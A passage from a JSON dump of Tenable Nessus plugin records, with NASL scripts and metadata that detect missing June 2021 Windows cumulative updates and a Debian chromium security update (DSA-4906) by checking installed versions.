"CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-33742"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003681.NASL", "href": "https://www.tenable.com/plugins/nessus/150354", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150354);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003671\");\n script_xref(name:\"MSKB\", value:\"5003681\");\n script_xref(name:\"MSFT\", value:\"MS21-5003671\");\n script_xref(name:\"MSFT\", value:\"MS21-5003681\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5003681: Windows Server 2012 R2 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003681. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003671\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003681\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003681',\n '5003671'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003681, 5003671])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:11:24", "description": "The remote Windows host is missing security update 5003638. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003638: Windows 10 version 1607 / Windows Server 2016 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003638.NASL", "href": "https://www.tenable.com/plugins/nessus/150367", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150367);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003638\");\n script_xref(name:\"MSFT\", value:\"MS21-5003638\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5003638: Windows 10 version 1607 / Windows Server 2016 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003638. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003638\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003638\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003638'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'14393',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003638])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:09:29", "description": "The remote Windows host is missing security update 5003687. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003687: Windows 10 version 1507 LTS Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003687.NASL", "href": "https://www.tenable.com/plugins/nessus/150353", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150353);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003687\");\n script_xref(name:\"MSFT\", value:\"MS21-5003687\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5003687: Windows 10 version 1507 LTS Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003687. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003687\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003687\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003687'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'10240',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003687])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T14:51:23", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2021-21201 Gengming Liu and Jianyu Chen discovered a use-after-free issue.\n\n - CVE-2021-21202 David Erceg discovered a use-after-free issue in extensions.\n\n - CVE-2021-21203 asnine discovered a use-after-free issue in Blink/Webkit.\n\n - CVE-2021-21204 Tsai-Simek, Jeanette Ulloa, and Emily Voigtlander discovered a use-after-free issue in Blink/Webkit.\n\n - CVE-2021-21205 Alison Huffman discovered a policy enforcement error.\n\n - CVE-2021-21207 koocola and Nan Wang discovered a use-after-free in the indexed database.\n\n - CVE-2021-21208 Ahmed Elsobky discovered a data validation error in the QR code scanner.\n\n - CVE-2021-21209 Tom Van Goethem discovered an implementation error in the Storage API.\n\n - CVE-2021-21210 @bananabr discovered an error in the networking implementation.\n\n - CVE-2021-21211 Akash Labade discovered an error in the navigation implementation.\n\n - CVE-2021-21212 Hugo Hue and Sze Yui Chau discovered an error in the network configuration user interface.\n\n - CVE-2021-21213 raven discovered a use-after-free issue in the WebMIDI implementation.\n\n - CVE-2021-21214 A use-after-free issue was discovered in the networking implementation.\n\n - CVE-2021-21215 Abdulrahman Alqabandi discovered an error in the Autofill feature.\n\n - CVE-2021-21216 Abdulrahman Alqabandi discovered an error in the Autofill feature.\n\n - CVE-2021-21217 Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\n - CVE-2021-21218 Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\n - CVE-2021-21219 Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\n - CVE-2021-21221 Guang Gong discovered insufficient validation of untrusted input.\n\n - CVE-2021-21222 Guang Gong discovered a buffer overflow issue in the v8 JavaScript library.\n\n - CVE-2021-21223 Guang Gong discovered an integer overflow issue.\n\n - CVE-2021-21224 Jose Martinez discovered a type error in the v8 JavaScript library.\n\n - CVE-2021-21225 Brendon Tiszka discovered an out-of-bounds memory access issue in the v8 JavaScript library.\n\n - CVE-2021-21226 Brendon Tiszka discovered a use-after-free issue in the networking implementation.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-04-29T00:00:00", "type": "nessus", "title": "Debian DSA-4906-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:chromium:*:*:*:*:*:*:*"], "id": "DEBIAN_DSA-4906.NASL", "href": "https://www.tenable.com/plugins/nessus/149082", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4906. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149082);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21201\", \"CVE-2021-21202\", \"CVE-2021-21203\", \"CVE-2021-21204\", \"CVE-2021-21205\", \"CVE-2021-21207\", \"CVE-2021-21208\", \"CVE-2021-21209\", \"CVE-2021-21210\", \"CVE-2021-21211\", \"CVE-2021-21212\", \"CVE-2021-21213\", \"CVE-2021-21214\", \"CVE-2021-21215\", \"CVE-2021-21216\", \"CVE-2021-21217\", \"CVE-2021-21218\", \"CVE-2021-21219\", \"CVE-2021-21221\", \"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\");\n script_xref(name:\"DSA\", value:\"4906\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Debian DSA-4906-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2021-21201\n Gengming Liu and Jianyu Chen discovered a use-after-free\n issue.\n\n - CVE-2021-21202\n David Erceg discovered a use-after-free issue in\n extensions.\n\n - CVE-2021-21203\n asnine discovered a use-after-free issue in\n Blink/Webkit.\n\n - CVE-2021-21204\n Tsai-Simek, Jeanette Ulloa, and Emily Voigtlander\n discovered a use-after-free issue in Blink/Webkit.\n\n - CVE-2021-21205\n Alison Huffman discovered a policy enforcement error.\n\n - CVE-2021-21207\n koocola and Nan Wang discovered a use-after-free in the\n indexed database.\n\n - CVE-2021-21208\n Ahmed Elsobky discovered a data validation error in the\n QR code scanner.\n\n - CVE-2021-21209\n Tom Van Goethem discovered an implementation error in\n the Storage API.\n\n - CVE-2021-21210\n @bananabr discovered an error in the networking\n implementation.\n\n - CVE-2021-21211\n Akash Labade discovered an error in the navigation\n implementation.\n\n - CVE-2021-21212\n Hugo Hue and Sze Yui Chau discovered an error in the\n network configuration user interface.\n\n - CVE-2021-21213\n raven discovered a use-after-free issue in the WebMIDI\n implementation.\n\n - CVE-2021-21214\n A use-after-free issue was discovered in the networking\n implementation.\n\n - CVE-2021-21215\n Abdulrahman Alqabandi discovered an error in the\n Autofill feature.\n\n - CVE-2021-21216\n Abdulrahman Alqabandi discovered an error in the\n Autofill feature.\n\n - CVE-2021-21217\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21218\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21219\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21221\n Guang Gong discovered insufficient validation of\n untrusted input.\n\n - CVE-2021-21222\n Guang Gong discovered a buffer overflow issue in the v8\n JavaScript library.\n\n - CVE-2021-21223\n Guang Gong discovered an integer overflow issue.\n\n - CVE-2021-21224\n Jose Martinez discovered a type error in the v8\n JavaScript library.\n\n - CVE-2021-21225\n Brendon Tiszka discovered an out-of-bounds memory access\n issue in the v8 JavaScript library.\n\n - CVE-2021-21226\n Brendon Tiszka discovered a use-after-free issue in the\n networking implementation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21202\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21205\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21208\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21217\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4906\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 90.0.4430.85-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", 